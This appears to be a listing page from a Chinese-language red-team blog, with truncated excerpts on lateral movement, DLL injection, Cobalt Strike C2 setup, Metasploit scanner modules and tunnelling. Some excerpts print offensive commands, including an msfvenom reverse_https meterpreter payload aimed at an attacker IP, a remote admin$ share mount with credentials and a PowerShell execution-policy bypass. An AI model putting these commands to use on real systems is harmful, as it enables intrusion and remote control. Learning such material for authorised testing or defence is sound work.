横向移动:schtasks远程计划任务 视频教程:横向移动手法介绍 拓扑图 执行的命令1234567891011121314151617181920212223242526272829303132333435363738394041net user administrator 123456net user administrator qwe123!net use \\192.168.123.67\admin$ /user:"a 2021-04-04 windows windows lateral-movement
反射式dll注入的演示 Powershell反射式dll注入 dll注入和反射式dll注入的区别合法进程 恶意dll 从本地或者dll调用 【生成恶意载荷,并执行web服务托管dll】 省略 【目标机器载入内存,使用反射式dll注入直接载入内存不落盘】 1234567PowerShell -Exec BypassImport-Module C:\Users\whale\Desktop\Invoke-Reflecti 2021-03-09 evasion evasion
dll注入的演示 前景提要whale的DLLHijack本地提权教程 进程注入与迁移 本期内容dll注入的演示 1.exe 2.exe msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.123.138 lport=2333 -f dll -o whale.dll python -m SimpleHTTPServer 80 handler 2021-03-07 evasion evasion
进程注入与迁移 进程注入与迁移 进程和线程的区别https://segmentfault.com/a/1190000039297639 进程,线程(公司)(人)卖食品、饮料、医疗、交通、房地产公司进程里有多个线程,就像一个公司里有多个员工 直接反弹shell的缺点: 进程注入的目的 进程的权限控制Integrity Levelhttps://blog.csdn.net/vlily/article/detai 2021-03-04 evasion evasion
应届生的面试题(四) 面试题1234567891011121314151617181920212223241、绕WAF2、反序列化 fastjson3、流量加密4、XXE5、命令执行 php&java的区别6、溯源7、中间件8、代码审计7、注入8、SSRF9、内网要怎么打1.证书透明2.Windows的Redis主从RCE3.PTH怎么利用和NTML验证端口是什么4.git和svn,svn5.CS怎么联 2021-02-20 Interview Interview
05-msf的泛微OA-rce扫描模块 写一个泛微OA的scanner扫描模块 这是python3的模块,使用方法是放到kali对应目录下:/usr/share/metasploit-framework/modules/auxiliary/scanner/http/weaver_e_cology_rce_scanner.py 12345678910111213141516171819202122232425262728293031323 2021-02-19 metasploit metasploit
04-redis未授权扫描模块 需要的资料 msf开发文档 metasploit 脚本开发基础知识,ruby语法 Shodan搜索引擎介绍、以及如何在Linux命令行安装 redis未授权访问漏洞复现 课程结构 shodan被动信息搜集,寻找有redis服务的主机 metasploit改插件,判断是否存在redis漏洞 验证漏洞扫描结果 总结 录制的视频msf开发实践(一)redis未授权扫描模块 1234567891011 2021-02-10 metasploit metasploit
cobaltstrike通过域名上线(六) 匿名邮箱注册https://mail.protonmail.com/login 注册免费域名http://www.freenom.com/en/index.html 配置CDN注册一个cloudflare账号,将注册好的域名解析到ip https://dash.cloudflare.com/login 具体怎么配置,查看这篇文章: 通过Cloudflare开启全站https cobaltstri 2021-02-06 cobaltstrike cobaltstrike
cobaltstrike dns隧道的上线 基础要理解cobaltstrike dns隧道的上线过程,首先要理解dns协议。 Domain Name System,dns是域名系统的缩写。默认使用的是53端口。 dns隧道使用的场景是在一个严格的内网环境,安全设备或者策略不允许其他端口出网,但是使用nslookup命令,发现可以使用dns协议,可以向外部的dns服务器发送请求,来进行外部域名解析。 外部域名解析也就是一个域名转换为IP的行为 2021-02-05 cobaltstrike cobaltstrike
ssf反向动态转发与正向的区别&反弹shell 正向动态转发(要访问的是ssfd服务端的网络)当我们要去连接内网的时候,可以直接访问到 ssf服务端设置(访问这个网络) 123456./ssfd -p 1080python -m SimpleHTTPServer 8000wget -r http://192.168.28.148:8000/ssfssf客户端设置:./ssf -D 1089 -p 8080 VPS-IP 反向动态转发(要访问的是 2021-01-30 tools tools